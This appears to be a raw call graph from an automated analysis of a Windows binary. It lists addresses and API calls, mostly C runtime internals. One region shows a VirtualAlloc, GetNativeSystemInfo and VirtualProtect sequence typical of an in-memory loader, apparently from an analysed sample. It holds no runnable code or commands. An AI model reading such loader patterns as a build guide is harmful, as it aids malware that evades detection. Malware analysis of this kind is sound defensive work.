7fef9d2ed4c 16953->16955 16958 7fef9d2cf80 DecodePointer 16953->16958 16956 7fef9d2cf80 _inconsistency 36 API calls 16955->16956 16957 7fef9d2ed88 16955->16957 16956->16957 16957->16951 16959 7fef9d2cf9e 16958->16959 16962 7fef9d2cf50 16959->16962 16964 7fef9d2cf59 16962->16964 16966 7fef9d339e0 16964->16966 16967 7fef9d339fa 16966->16967 16976 7fef9d2d430 DecodePointer 16967->16976 16969 7fef9d33a09 16970 7fef9d33a20 16969->16970 16971 7fef9d2cff0 terminate 34 API calls 16969->16971 16972 7fef9d33a42 16970->16972 16973 7fef9d2be50 _invoke_watson_if_oneof 14 API calls 16970->16973 16971->16970 16974 7fef9d27090 _exit 33 API calls 16972->16974 16973->16972 16975 7fef9d2cf78 16974->16975 
16975->16955 16976->16969 16982 7fef9d23409 16983 7fef9d23e00 3 API calls 16982->16983 16984 7fef9d2340e 16983->16984 16987 7fef9d288d0 HeapDestroy 16984->16987 16986 7fef9d23413 16987->16986 18150 7fef9d23909 18151 7fef9d23913 __SehTransFilter 18150->18151 18152 7fef9d239db __SehTransFilter 18151->18152 18153 7fef9d23a71 RtlUnwindEx 18151->18153 18153->18152 18177 7fef9d3c30d 18178 7fef9d3c31a get_int64_arg _get_printf_count_output 18177->18178 18179 7fef9d3c39d 18178->18179 18190 7fef9d3c3f2 18178->18190 18180 7fef9d2bd70 _invalid_parameter 17 API calls 18179->18180 18181 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18180->18181 18183 7fef9d23280 __GSHandlerCheck 8 API calls 18181->18183 18182 7fef9d3b99c 18185 7fef9d3cc93 18182->18185 18188 7fef9d3bada 18182->18188 18184 7fef9d3cd90 18183->18184 18185->18181 18187 7fef9d2bd70 _invalid_parameter 17 API calls 18185->18187 18186 7fef9d3b530 wctomb_s 19 API calls 18186->18190 18187->18181 18189 7fef9d2bd70 _invalid_parameter 17 API calls 18188->18189 18189->18181 18190->18182 18190->18186 16393 7fef9d23d30 16411 7fef9d27540 16393->16411 16398 7fef9d23d4e FlsAlloc 16401 7fef9d23d73 _calloc_dbg 16398->16401 16402 7fef9d23d6a 16398->16402 16399 7fef9d23d42 16400 7fef9d23e00 3 API calls 16399->16400 16403 7fef9d23d47 16400->16403 16405 7fef9d23da4 FlsSetValue 16401->16405 16406 7fef9d23db9 16401->16406 16404 7fef9d23e00 3 API calls 16402->16404 16404->16403 16405->16406 16407 7fef9d23dc2 16405->16407 16408 7fef9d23e00 3 API calls 16406->16408 16420 7fef9d23e30 16407->16420 16408->16403 16426 7fef9d23d00 RtlEncodePointer 16411->16426 16413 7fef9d27549 _initp_misc_winsig 16427 7fef9d2cf20 EncodePointer 16413->16427 16415 7fef9d23d39 16416 7fef9d28fe0 16415->16416 16418 7fef9d28ff6 16416->16418 16417 7fef9d23d3e 16417->16398 16417->16399 16418->16417 16419 7fef9d29022 InitializeCriticalSectionAndSpinCount 16418->16419 16419->16417 16419->16418 16421 7fef9d23ead 16420->16421 16428 7fef9d29360 LeaveCriticalSection 16421->16428 
16423 7fef9d23ec7 _updatetlocinfoEx_nolock 16429 7fef9d29360 LeaveCriticalSection 16423->16429 16425 7fef9d23dce GetCurrentThreadId 16425->16403 16426->16413 16427->16415 16428->16423 16429->16425 16997 7fef9d2e830 16998 7fef9d2e857 16997->16998 17001 7fef9d33cc0 16998->17001 17002 7fef9d33cdd 17001->17002 17004 7fef9d33d82 17002->17004 17005 7fef9d33ef3 __SehTransFilter 17002->17005 17016 7fef9d2e8e3 17002->17016 17006 7fef9d33dc8 17004->17006 17010 7fef9d33e40 17004->17010 17004->17016 17005->17016 17039 7fef9d340b0 17005->17039 17019 7fef9d33a60 17006->17019 17011 7fef9d2cf80 _inconsistency 36 API calls 17010->17011 17014 7fef9d33e93 17010->17014 17017 7fef9d33ebd 17010->17017 17011->17014 17012 7fef9d33e08 17025 7fef9d34f20 17012->17025 17013 7fef9d2cf80 _inconsistency 36 API calls 17013->17012 17015 7fef9d34f20 __SehTransFilter 36 API calls 17014->17015 17015->17017 17017->17016 17032 7fef9d2e790 17017->17032 17020 7fef9d33a7b 17019->17020 17021 7fef9d33a7d 17019->17021 17023 7fef9d2cf80 _inconsistency 36 API calls 17020->17023 17024 7fef9d33aa5 17020->17024 17022 7fef9d2cf80 _inconsistency 36 API calls 17021->17022 17022->17020 17023->17024 17024->17012 17024->17013 17084 7fef9d33b70 17025->17084 17027 7fef9d2cf80 _inconsistency 36 API calls 17031 7fef9d34f55 __SehTransFilter _SetImageBase __SetState 17027->17031 17028 7fef9d35103 17029 7fef9d3514a __SetState 17028->17029 17030 7fef9d2cf80 _inconsistency 36 API calls 17028->17030 17029->17016 17030->17029 17031->17027 17031->17028 17091 7fef9d2e500 17032->17091 17035 7fef9d33b40 __StateFromControlPc 36 API calls 17036 7fef9d2e7d0 __SehTransFilter 17035->17036 17037 7fef9d34f20 __SehTransFilter 36 API calls 17036->17037 17038 7fef9d2e81e 17037->17038 17038->17016 17040 7fef9d33b40 __StateFromControlPc 36 API calls 17039->17040 17041 7fef9d340ea 17040->17041 17042 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17041->17042 17043 7fef9d34110 17042->17043 17096 7fef9d33c70 17043->17096 17046 7fef9d34133 __SetState 
17099 7fef9d33c00 17046->17099 17047 7fef9d34176 17048 7fef9d33c70 __GetUnwindTryBlock 37 API calls 17047->17048 17049 7fef9d34174 17048->17049 17051 7fef9d2cf80 _inconsistency 36 API calls 17049->17051 17052 7fef9d341af _ValidateRead _SetThrowImageBase 17049->17052 17051->17052 17054 7fef9d34347 17052->17054 17061 7fef9d34235 17052->17061 17069 7fef9d2cf80 _inconsistency 36 API calls 17052->17069 17071 7fef9d3428e 17052->17071 17053 7fef9d347d9 17055 7fef9d347f3 17053->17055 17056 7fef9d34847 17053->17056 17062 7fef9d347d7 17053->17062 17054->17053 17057 7fef9d343f5 17054->17057 17129 7fef9d34960 17055->17129 17059 7fef9d2cf50 terminate 35 API calls 17056->17059 17064 7fef9d3466c __SehTransFilter 17057->17064 17114 7fef9d2ea30 17057->17114 17059->17062 17061->17016 17062->17061 17063 7fef9d2cf80 _inconsistency 36 API calls 17062->17063 17063->17061 17064->17062 17065 7fef9d35bb0 __SehTransFilter 36 API calls 17064->17065 17066 7fef9d34727 17065->17066 17066->17062 17067 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17066->17067 17068 7fef9d34767 17067->17068 17126 7fef9d2edc0 RtlUnwindEx 17068->17126 17069->17071 17072 7fef9d2cf80 _inconsistency 36 API calls 17071->17072 17073 7fef9d342fa 17071->17073 17072->17073 17073->17054 17102 7fef9d35bb0 17073->17102 17074 7fef9d34450 __SehTransFilter 17074->17064 17119 7fef9d35180 17074->17119 17077 7fef9d34340 __SehTransFilter 17077->17054 17078 7fef9d34393 17077->17078 17079 7fef9d3435a __SehTransFilter 17077->17079 17080 7fef9d2cf50 terminate 35 API calls 17078->17080 17108 7fef9d34870 17079->17108 17080->17054 17085 7fef9d33b9a 17084->17085 17086 7fef9d33ba9 17084->17086 17088 7fef9d33b40 17085->17088 17086->17031 17089 7fef9d33a60 __StateFromControlPc 36 API calls 17088->17089 17090 7fef9d33b65 17089->17090 17090->17086 17092 7fef9d33b40 __StateFromControlPc 36 API calls 17091->17092 17094 7fef9d2e539 17092->17094 17093 7fef9d2e601 17093->17035 17094->17093 17095 7fef9d2e5c2 RtlLookupFunctionEntry 17094->17095 
17095->17093 17097 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17096->17097 17098 7fef9d33c9c 17097->17098 17098->17046 17098->17047 17100 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17099->17100 17101 7fef9d33c31 17100->17101 17101->17049 17103 7fef9d35bc6 17102->17103 17104 7fef9d35bc8 17102->17104 17106 7fef9d2cf50 terminate 35 API calls 17103->17106 17107 7fef9d35bda __SehTransFilter 17103->17107 17105 7fef9d2cf80 _inconsistency 36 API calls 17104->17105 17105->17103 17106->17107 17107->17077 17139 7fef9d3d4e0 17108->17139 17111 7fef9d3d320 17112 7fef9d3d375 17111->17112 17113 7fef9d3d3ba RaiseException 17112->17113 17113->17054 17115 7fef9d33b40 __StateFromControlPc 36 API calls 17114->17115 17116 7fef9d2ea6f 17115->17116 17117 7fef9d2cf80 _inconsistency 36 API calls 17116->17117 17118 7fef9d2ea7a 17116->17118 17117->17118 17118->17074 17120 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17119->17120 17121 7fef9d351c1 17120->17121 17122 7fef9d351f0 __SehTransFilter 17121->17122 17146 7fef9d35970 17121->17146 17124 7fef9d2edc0 __SehTransFilter 9 API calls 17122->17124 17125 7fef9d35259 17124->17125 17125->17074 17127 7fef9d23280 __GSHandlerCheck 8 API calls 17126->17127 17128 7fef9d2eee7 17127->17128 17128->17062 17131 7fef9d34990 17129->17131 17136 7fef9d3498b 17129->17136 17130 7fef9d349b2 __SehTransFilter 17132 7fef9d34a41 17130->17132 17133 7fef9d2cf80 _inconsistency 36 API calls 17130->17133 17130->17136 17131->17130 17163 7fef9d23d00 RtlEncodePointer 17131->17163 17134 7fef9d2ea30 __SehTransFilter 36 API calls 17132->17134 17133->17132 17137 7fef9d34a8e __SehTransFilter 17134->17137 17136->17062 17137->17136 17138 7fef9d35180 __SehTransFilter 38 API calls 17137->17138 17138->17136 17142 7fef9d3d660 17139->17142 17143 7fef9d3437d 17142->17143 17144 7fef9d3d676 std::exception::_Copy_str malloc 17142->17144 17143->17111 17144->17143 17145 7fef9d2d490 std::exception::_Copy_str 17 API calls 17144->17145 17145->17143 17147 7fef9d35998 17146->17147 17150 
7fef9d355f0 17147->17150 17149 7fef9d359d3 __SehTransFilter __AdjustPointer 17149->17122 17151 7fef9d3561e __SehTransFilter 17150->17151 17152 7fef9d35765 17151->17152 17153 7fef9d356fa _ValidateRead 17151->17153 17160 7fef9d356aa __SehTransFilter __AdjustPointer 17151->17160 17154 7fef9d35813 __SehTransFilter 17152->17154 17158 7fef9d3577a _ValidateRead 17152->17158 17157 7fef9d2cf80 _inconsistency 36 API calls 17153->17157 17153->17160 17155 7fef9d3584d _ValidateRead 17154->17155 17156 7fef9d358c6 __SehTransFilter _ValidateExecute _ValidateRead 17154->17156 17155->17160 17162 7fef9d2cf80 _inconsistency 36 API calls 17155->17162 17156->17160 17161 7fef9d2cf80 _inconsistency 36 API calls 17156->17161 17157->17160 17159 7fef9d2cf80 _inconsistency 36 API calls 17158->17159 17158->17160 17159->17160 17160->17149 17161->17160 17162->17160 17163->17130 18191 7fef9d23130 18192 7fef9d23170 __GSHandlerCheck 8 API calls 18191->18192 18193 7fef9d23160 18192->18193 17164 7fef9d3c435 17165 7fef9d3c479 _CrtMemDumpAllObjectsSince 17164->17165 17166 7fef9d3c598 DecodePointer 17165->17166 17167 7fef9d3c60d _CrtMemDumpAllObjectsSince 17166->17167 17168 7fef9d3c62b DecodePointer 17167->17168 17169 7fef9d3c652 _CrtMemDumpAllObjectsSince 17167->17169 17168->17169 17170 7fef9d3c676 DecodePointer 17169->17170 17180 7fef9d3c69d std::exception::_Copy_str 17169->17180 17170->17180 17171 7fef9d3b99c 17172 7fef9d3cc93 17171->17172 17177 7fef9d3bada 17171->17177 17174 7fef9d2bd70 _invalid_parameter 17 API calls 17172->17174 17175 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17172->17175 17174->17175 17176 7fef9d23280 __GSHandlerCheck 8 API calls 17175->17176 17178 7fef9d3cd90 17176->17178 17179 7fef9d2bd70 _invalid_parameter 17 API calls 17177->17179 17179->17175 17180->17171 17181 7fef9d3b530 17180->17181 17184 7fef9d3b090 17181->17184 17183 7fef9d3b56c 17183->17180 17185 7fef9d3b0b7 17184->17185 17186 7fef9d3b1a6 _CrtMemDumpAllObjectsSince 17185->17186 17187 7fef9d3b168 17185->17187 17193 
7fef9d3b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17185->17193 17189 7fef9d3b347 _CrtMemDumpAllObjectsSince 17186->17189 17194 7fef9d3b1cf 17186->17194 17188 7fef9d2bd70 _invalid_parameter 17 API calls 17187->17188 17188->17193 17190 7fef9d3b359 WideCharToMultiByte 17189->17190 17191 7fef9d3b3ab 17190->17191 17192 7fef9d3b3c1 GetLastError 17191->17192 17191->17193 17192->17193 17196 7fef9d3b3d0 _calloc_dbg_impl 17192->17196 17193->17183 17194->17193 17195 7fef9d2bd70 _invalid_parameter 17 API calls 17194->17195 17195->17193 17196->17193 17197 7fef9d2bd70 _invalid_parameter 17 API calls 17196->17197 17197->17193 16439 7fef9d23433 16440 7fef9d23437 16439->16440 16446 7fef9d23446 16439->16446 16441 7fef9d27d00 _ioterm DeleteCriticalSection 16440->16441 16442 7fef9d2343c 16441->16442 16443 7fef9d23e00 3 API calls 16442->16443 16444 7fef9d23441 16443->16444 16447 7fef9d288d0 HeapDestroy 16444->16447 16447->16446 17198 7fef9d3d830 17199 7fef9d3d8aa 17198->17199 17200 7fef9d3d926 17199->17200 17201 7fef9d3d97b 17199->17201 17202 7fef9d2bd70 _invalid_parameter 17 API calls 17200->17202 17203 7fef9d3d9ee 17201->17203 17205 7fef9d3da43 17201->17205 17207 7fef9d3d95a _LocaleUpdate::~_LocaleUpdate 17202->17207 17204 7fef9d2bd70 _invalid_parameter 17 API calls 17203->17204 17204->17207 17209 7fef9d3eca1 17205->17209 17211 7fef9d3dbb5 17205->17211 17206 7fef9d23280 __GSHandlerCheck 8 API calls 17208 7fef9d3ed9e 17206->17208 17207->17206 17209->17207 17210 7fef9d2bd70 _invalid_parameter 17 API calls 17209->17210 17210->17207 17212 7fef9d2bd70 _invalid_parameter 17 API calls 17211->17212 17212->17207 17213 7fef9d26c32 17214 7fef9d26c3c 17213->17214 17215 7fef9d26c7a _CrtMemDumpAllObjectsSince 17214->17215 17216 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 17214->17216 17219 7fef9d2c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 17215->17219 17220 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 17215->17220 17217 7fef9d23280 __GSHandlerCheck 8 API 
calls 17216->17217 17218 7fef9d26e89 17217->17218 17219->17220 17221 7fef9d2c0c0 _swprintf_p 17 API calls 17220->17221 17223 7fef9d26dc7 17221->17223 17222 7fef9d26e12 17223->17222 17224 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17223->17224 17224->17222 17225 7fef9d33e3b 17226 7fef9d33ec7 17225->17226 17227 7fef9d2e790 __SehTransFilter 37 API calls 17226->17227 17228 7fef9d33ee4 17227->17228 16507 2b0000 16508 2b0183 16507->16508 16509 2b043e VirtualAlloc 16508->16509 16513 2b0462 16509->16513 16510 2b0a00 16511 2b0531 GetNativeSystemInfo 16511->16510 16512 2b056d VirtualAlloc 16511->16512 16514 2b058b 16512->16514 16513->16510 16513->16511 16514->16510 16515 2b09d9 VirtualProtect 16514->16515 16515->16514 17229 7fef9d2443c 17230 7fef9d2444c 17229->17230 17233 7fef9d29360 LeaveCriticalSection 17230->17233 17232 7fef9d248be 17233->17232 18218 7fef9d39939 18219 7fef9d39951 __doserrno 18218->18219 18220 7fef9d2bd70 _invalid_parameter 17 API calls 18219->18220 18221 7fef9d399d7 18220->18221 18222 7fef9d23280 __GSHandlerCheck 8 API calls 18221->18222 18223 7fef9d3a9f5 18222->18223 17234 7fef9d3e424 17235 7fef9d3e469 _CrtMemDumpAllObjectsSince 17234->17235 17236 7fef9d3e588 DecodePointer 17235->17236 17237 7fef9d3e5fd _CrtMemDumpAllObjectsSince 17236->17237 17238 7fef9d3e642 _CrtMemDumpAllObjectsSince 17237->17238 17239 7fef9d3e61b DecodePointer 17237->17239 17240 7fef9d3e666 DecodePointer 17238->17240 17241 7fef9d3e68d std::exception::_Copy_str 17238->17241 17239->17238 17240->17241 17242 7fef9d3eadf 17241->17242 17251 7fef9d3da75 17241->17251 17263 7fef9d3eec0 17241->17263 17267 7fef9d3ef10 17242->17267 17245 7fef9d3eafd 17246 7fef9d3eb33 17245->17246 17248 7fef9d3eec0 25 API calls 17245->17248 17247 7fef9d3ec29 17246->17247 17261 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17246->17261 17249 7fef9d3ebda 17247->17249 17250 7fef9d3ef10 25 API calls 17247->17250 17248->17246 17249->17251 17254 7fef9d3eec0 25 API calls 17249->17254 17250->17249 17252 7fef9d3eca1 
17251->17252 17257 7fef9d3dbb5 17251->17257 17253 7fef9d2bd70 _invalid_parameter 17 API calls 17252->17253 17255 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17252->17255 17253->17255 17254->17251 17256 7fef9d23280 __GSHandlerCheck 8 API calls 17255->17256 17258 7fef9d3ed9e 17256->17258 17260 7fef9d2bd70 _invalid_parameter 17 API calls 17257->17260 17260->17255 17261->17249 17271 7fef9d3f000 17261->17271 17278 7fef9d3ee40 17261->17278 17264 7fef9d3eed7 17263->17264 17265 7fef9d3ef07 17264->17265 17266 7fef9d3ee40 25 API calls 17264->17266 17265->17242 17266->17264 17269 7fef9d3ef2c 17267->17269 17268 7fef9d3ef4d 17268->17245 17269->17268 17270 7fef9d3ee40 25 API calls 17269->17270 17270->17269 17272 7fef9d3f026 _CrtMemDumpAllObjectsSince wcsxfrm 17271->17272 17275 7fef9d3f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17271->17275 17273 7fef9d3f276 _CrtMemDumpAllObjectsSince 17272->17273 17272->17275 17276 7fef9d3f146 _CrtMemDumpAllObjectsSince 17272->17276 17274 7fef9d3f29d MultiByteToWideChar 17273->17274 17274->17275 17275->17261 17276->17275 17277 7fef9d3f1b5 MultiByteToWideChar 17276->17277 17277->17275 17279 7fef9d3ee62 17278->17279 17281 7fef9d3ee6e 17279->17281 17282 7fef9d3f360 17279->17282 17281->17261 17283 7fef9d3f719 17282->17283 17284 7fef9d3f399 17282->17284 17287 7fef9d40170 23 API calls 17283->17287 17317 7fef9d3f4f2 17283->17317 17318 7fef9d3afb0 17284->17318 17287->17317 17288 7fef9d23280 __GSHandlerCheck 8 API calls 17290 7fef9d3f7c5 17288->17290 17289 7fef9d3f3ed 17293 7fef9d3f4c7 17289->17293 17294 7fef9d3afb0 _fflush_nolock 17 API calls 17289->17294 17290->17281 17291 7fef9d3afb0 _fflush_nolock 17 API calls 17292 7fef9d3f3b8 17291->17292 17292->17289 17295 7fef9d3afb0 _fflush_nolock 17 API calls 17292->17295 17293->17317 17322 7fef9d40170 17293->17322 17297 7fef9d3f43d 17294->17297 17299 7fef9d3f3ca 17295->17299 17298 7fef9d3f484 17297->17298 17300 7fef9d3afb0 _fflush_nolock 17 API calls 17297->17300 17298->17293 17303 7fef9d3f561 
17298->17303 17301 7fef9d3afb0 _fflush_nolock 17 API calls 17299->17301 17302 7fef9d3f44f 17300->17302 17301->17289 17302->17298 17306 7fef9d3afb0 _fflush_nolock 17 API calls 17302->17306 17304 7fef9d3afb0 _fflush_nolock 17 API calls 17303->17304 17305 7fef9d3f56e 17304->17305 17307 7fef9d3f5b8 17305->17307 17309 7fef9d3afb0 _fflush_nolock 17 API calls 17305->17309 17308 7fef9d3f461 17306->17308 17307->17283 17312 7fef9d3f604 17307->17312 17310 7fef9d3afb0 _fflush_nolock 17 API calls 17308->17310 17311 7fef9d3f580 17309->17311 17310->17298 17311->17307 17314 7fef9d3afb0 _fflush_nolock 17 API calls 17311->17314 17313 7fef9d3b530 wctomb_s 19 API calls 17312->17313 17313->17317 17315 7fef9d3f592 17314->17315 17316 7fef9d3afb0 _fflush_nolock 17 API calls 17315->17316 17316->17307 17317->17288 17320 7fef9d3afc1 17318->17320 17319 7fef9d3b04b 17319->17289 17319->17291 17320->17319 17321 7fef9d2bd70 _invalid_parameter 17 API calls 17320->17321 17321->17319 17323 7fef9d40185 17322->17323 17324 7fef9d3afb0 _fflush_nolock 17 API calls 17323->17324 17326 7fef9d401c7 17324->17326 17325 7fef9d401dc 17325->17317 17326->17325 17327 7fef9d3ab10 17 API calls 17326->17327 17328 7fef9d40326 17326->17328 17327->17328 17328->17325 17329 7fef9d39290 23 API calls 17328->17329 17329->17325 17330 7fef9d25a25 17331 7fef9d25a37 17330->17331 17332 7fef9d2bd70 _invalid_parameter 17 API calls 17331->17332 17333 7fef9d25aaf 17332->17333 18224 7fef9d34920 18227 7fef9d3d530 18224->18227 18230 7fef9d3d580 18227->18230 18231 7fef9d3d59a std::exception::_Tidy 18230->18231 18232 7fef9d3493d 18230->18232 18231->18232 18233 7fef9d3d660 std::exception::_Copy_str 17 API calls 18231->18233 18233->18232 18238 7fef9d29328 18239 7fef9d29336 EnterCriticalSection 18238->18239 18240 7fef9d2932c 18238->18240 18240->18239 18241 7fef9d3ff2d 18242 7fef9d3ff37 18241->18242 18243 7fef9d40042 18242->18243 18244 7fef9d3ff47 18242->18244 18256 7fef9d29360 LeaveCriticalSection 18243->18256 18245 7fef9d4003d 18244->18245 
18248 7fef9d3ae90 _lock_file2 EnterCriticalSection 18244->18248 18247 7fef9d4004c 18249 7fef9d3ff97 18248->18249 18250 7fef9d3ffd0 18249->18250 18252 7fef9d3ffe1 18249->18252 18253 7fef9d3ffbb 18249->18253 18251 7fef9d3af60 _unlock_file2 2 API calls 18250->18251 18251->18245 18252->18250 18255 7fef9d3fd70 _fflush_nolock 25 API calls 18252->18255 18254 7fef9d3fd70 _fflush_nolock 25 API calls 18253->18254 18254->18250 18255->18250 18256->18247 18261 7fef9d2b12b 18262 7fef9d2b14c 18261->18262 18263 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18262->18263 18265 7fef9d2b2e0 18262->18265 18263->18265 18264 7fef9d2b33e 18277 7fef9d30cc0 18264->18277 18265->18264 18266 7fef9d2d490 std::exception::_Copy_str 17 API calls 18265->18266 18268 7fef9d2b311 18266->18268 18271 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18268->18271 18270 7fef9d2b37d 18275 7fef9d23280 __GSHandlerCheck 8 API calls 18270->18275 18271->18264 18272 7fef9d2cff0 terminate 34 API calls 18273 7fef9d2b373 18272->18273 18274 7fef9d27090 _exit 33 API calls 18273->18274 18274->18270 18276 7fef9d2b3a0 18275->18276 18295 7fef9d23d00 RtlEncodePointer 18277->18295 18279 7fef9d30cf6 18280 7fef9d30d23 LoadLibraryW 18279->18280 18281 7fef9d30e15 18279->18281 18282 7fef9d30d44 GetProcAddress 18280->18282 18290 7fef9d30d3d 18280->18290 18284 7fef9d30e39 DecodePointer DecodePointer 18281->18284 18292 7fef9d30e68 18281->18292 18283 7fef9d30d6a 7 API calls 18282->18283 18282->18290 18283->18281 18287 7fef9d30df3 GetProcAddress EncodePointer 18283->18287 18284->18292 18285 7fef9d30f60 DecodePointer 18285->18290 18286 7fef9d23280 __GSHandlerCheck 8 API calls 18291 7fef9d2b358 18286->18291 18287->18281 18288 7fef9d30eed DecodePointer 18289 7fef9d30f0d 18288->18289 18289->18285 18293 7fef9d30f2f DecodePointer 18289->18293 18290->18286 18291->18270 18291->18272 18292->18288 18292->18289 18294 7fef9d30ec8 18292->18294 18293->18285 18293->18294 18294->18285 18295->18279 18296 7fef9d234d5 18297 7fef9d234da _calloc_dbg 
18296->18297 18298 7fef9d2350b FlsSetValue 18297->18298 18302 7fef9d23548 18297->18302 18299 7fef9d23520 18298->18299 18298->18302 18300 7fef9d23e30 LeaveCriticalSection 18299->18300 18301 7fef9d2352c GetCurrentThreadId 18300->18301 18301->18302 18303 7fef9d25ad9 18304 7fef9d25add 18303->18304 18305 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18304->18305 18306 7fef9d25b3a 18305->18306 18309 7fef9d29360 LeaveCriticalSection 18306->18309 18308 7fef9d25c14 18309->18308 17343 7fef9d233d6 17346 7fef9d288d0 HeapDestroy 17343->17346 17345 7fef9d233db 17346->17345 18321 7fef9d266da 18322 7fef9d26725 18321->18322 18325 7fef9d26745 18321->18325 18322->18325 18327 7fef9d29a70 18322->18327 18324 7fef9d2677f 18325->18324 18326 7fef9d29b10 __updatetmbcinfo LeaveCriticalSection 18325->18326 18326->18324 18329 7fef9d29a79 _updatetlocinfoEx_nolock 18327->18329 18328 7fef9d29ad8 18328->18325 18329->18328 18331 7fef9d29360 LeaveCriticalSection 18329->18331 18331->18328 18332 7fef9d268c4 18334 7fef9d268d1 18332->18334 18333 7fef9d26ba6 18350 7fef9d29360 LeaveCriticalSection 18333->18350 18334->18333 18337 7fef9d268ed _CrtIsValidPointer 18334->18337 18336 7fef9d26bb0 18338 7fef9d2695e IsBadReadPtr 18337->18338 18339 7fef9d26976 18337->18339 18348 7fef9d2692f 18337->18348 18338->18339 18340 7fef9d26ad2 18339->18340 18341 7fef9d26a29 18339->18341 18342 7fef9d26add 18340->18342 18345 7fef9d26b2d 18340->18345 18343 7fef9d26abe 18341->18343 18344 7fef9d26a86 IsBadReadPtr 18341->18344 18347 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18342->18347 18346 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18343->18346 18344->18343 18344->18348 18345->18348 18349 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18345->18349 18346->18348 18347->18348 18349->18348 18350->18336 18351 7fef9d376c0 18352 7fef9d376cf _CrtMemDumpAllObjectsSince 18351->18352 18353 7fef9d37be3 _CrtMemDumpAllObjectsSince 18351->18353 18355 7fef9d37905 _CrtMemDumpAllObjectsSince 18352->18355 
18356 7fef9d377f5 _CrtMemDumpAllObjectsSince wcsncnt 18352->18356 18364 7fef9d376e6 _LocaleUpdate::~_LocaleUpdate 18352->18364 18354 7fef9d37cc6 WideCharToMultiByte 18353->18354 18353->18364 18354->18364 18357 7fef9d3790f WideCharToMultiByte 18355->18357 18360 7fef9d37827 WideCharToMultiByte 18356->18360 18359 7fef9d37965 18357->18359 18358 7fef9d23280 __GSHandlerCheck 8 API calls 18361 7fef9d37d85 18358->18361 18362 7fef9d3799a GetLastError 18359->18362 18359->18364 18360->18364 18362->18364 18365 7fef9d379d3 _CrtMemDumpAllObjectsSince 18362->18365 18363 7fef9d37a05 WideCharToMultiByte 18363->18364 18363->18365 18364->18358 18365->18363 18365->18364 17359 7fef9d2f7f1 17360 7fef9d2f80d 17359->17360 17381 7fef9d2f8de _wcsftime_l 17359->17381 17416 7fef9d36fb0 17360->17416 17362 7fef9d2fa70 17423 7fef9d369c0 17362->17423 17364 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17367 7fef9d2f85a OutputDebugStringA 17364->17367 17366 7fef9d2f9f4 17366->17362 17370 7fef9d2d490 std::exception::_Copy_str 17 API calls 17366->17370 17371 7fef9d2f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 17367->17371 17368 7fef9d2fa8a 17369 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17368->17369 17372 7fef9d2fab7 17369->17372 17373 7fef9d2fa43 17370->17373 17375 7fef9d2f8ce 17371->17375 17377 7fef9d2fb24 17372->17377 17379 7fef9d369c0 17 API calls 17372->17379 17392 7fef9d2fb6a 17372->17392 17376 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17373->17376 17386 7fef9d23280 __GSHandlerCheck 8 API calls 17375->17386 17376->17362 17380 7fef9d369c0 17 API calls 17377->17380 17378 7fef9d2f996 17378->17366 17388 7fef9d2d490 std::exception::_Copy_str 17 API calls 17378->17388 17382 7fef9d2faf7 17379->17382 17383 7fef9d2fb3d 17380->17383 17381->17366 17381->17378 17387 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17381->17387 17384 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17382->17384 17385 7fef9d27ff0 _invoke_watson_if_error 16 API calls 
16320->16331 16321->16322 16323 7fef9d26ad2 16322->16323 16324 7fef9d26a29 16322->16324 16325 7fef9d26add 16323->16325 16328 7fef9d26b2d 16323->16328 16326 7fef9d26abe 16324->16326 16327 7fef9d26a86 IsBadReadPtr 16324->16327 16330 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16325->16330 16333 7fef9d26bf0 16326->16333 16327->16326 16327->16331 16328->16331 16332 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16328->16332 16330->16331 16331->16313 16332->16331 16334 7fef9d26c28 16333->16334 16335 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 16334->16335 16336 7fef9d26c7a _CrtMemDumpAllObjectsSince 16334->16336 16337 7fef9d23280 __GSHandlerCheck 8 API calls 16335->16337 16340 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16336->16340 16346 7fef9d2c260 16336->16346 16338 7fef9d26e89 16337->16338 16338->16331 16350 7fef9d2c0c0 16340->16350 16342 7fef9d26e12 16342->16331 16343 7fef9d26dc7 16343->16342 16353 7fef9d26ea0 16343->16353 16345->16319 16348 7fef9d2c286 _CrtMemDumpAllObjectsSince wcsxfrm 16346->16348 16347 7fef9d2c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16347->16340 16348->16347 16357 7fef9d2f4d0 16348->16357 16368 7fef9d32260 16350->16368 16352 7fef9d2c103 16352->16343 16354 7fef9d26ed1 16353->16354 16355 7fef9d26ebd 16353->16355 16354->16342 16355->16354 16356 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16355->16356 16356->16354 16358 7fef9d2f4f9 _CrtMemDumpAllObjectsSince 16357->16358 16361 7fef9d2f570 16358->16361 16360 7fef9d2f550 _LocaleUpdate::~_LocaleUpdate 16360->16347 16362 7fef9d2f599 MultiByteToWideChar 16361->16362 16364 7fef9d2f60b 